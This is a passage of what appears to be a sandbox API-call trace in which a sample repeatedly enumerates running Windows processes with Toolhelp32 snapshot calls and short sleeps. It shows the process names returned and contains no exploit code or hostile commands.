dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0238.873] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1228, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0238.875] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0238.877] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0238.880] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0238.881] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0238.883] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x344, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0238.885] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x344, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 0 [0238.887] CloseHandle (hObject=0x24f0) returned 1 [0238.887] Sleep (dwMilliseconds=0x64) [0238.891] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0238.911] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.913] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x81, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0238.915] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0238.917] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0238.919] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0238.921] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0238.923] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0238.925] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0238.927] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0238.929] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.931] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.933] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0238.935] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x47, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.937] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.939] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x380, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.941] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.946] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.948] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.954] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.956] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0238.958] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x524, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0238.960] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x630, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0238.962] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x64c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0238.964] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.966] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0238.968] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0238.970] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0238.972] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0238.974] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.976] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0238.978] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0238.980] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.982] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0238.984] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0238.988] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0238.990] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0238.992] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0238.994] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0239.004] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-red.exe")) returned 1 [0239.007] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="what_drive_decide.exe")) returned 1 [0239.009] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="truth-statement.exe")) returned 1 [0239.011] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="let_dark.exe")) returned 1 [0239.013] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="safe somebody.exe")) returned 1 [0239.015] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="singthatheart.exe")) returned 1 [0239.018] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="low.exe")) returned 1 [0239.020] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="apply-would.exe")) returned 1 [0239.066] Sleep (dwMilliseconds=0x64) [0239.068] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0239.085] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.153] Sleep (dwMilliseconds=0x64) [0239.155] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0239.203] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.320] Sleep (dwMilliseconds=0x64) [0239.324] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0239.341] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.417] Sleep (dwMilliseconds=0x64) [0239.420] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0239.436] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.504] Sleep (dwMilliseconds=0x64) [0239.532] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0239.545] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.613] Sleep (dwMilliseconds=0x64) [0239.615] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0239.631] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.694] Sleep (dwMilliseconds=0x64) [0239.695] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0239.709] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.799] Sleep (dwMilliseconds=0x64) [0239.805] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0239.820] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.896] Sleep (dwMilliseconds=0x64) [0239.907] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0239.921] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.038] Sleep (dwMilliseconds=0x64) [0240.042] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0240.062] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.127] Sleep (dwMilliseconds=0x64) [0240.130] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0240.145] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.295] Sleep (dwMilliseconds=0x64) [0240.297] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0240.308] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.373] Sleep (dwMilliseconds=0x64) [0240.374] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0240.388] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.576] Sleep (dwMilliseconds=0x64) [0240.579] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0240.598] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.677] Sleep (dwMilliseconds=0x64) [0240.680] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0240.693] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.784] Sleep (dwMilliseconds=0x64) [0240.789] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0240.808] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.891] Sleep (dwMilliseconds=0x64) [0240.900] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0240.918] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.003] Sleep (dwMilliseconds=0x64) [0241.012] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0241.028] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.105] Sleep (dwMilliseconds=0x64) [0241.108] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0241.123] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.246] Sleep (dwMilliseconds=0x64) [0241.251] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0241.271] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.331] Sleep (dwMilliseconds=0x64) [0241.332] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0241.347] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, 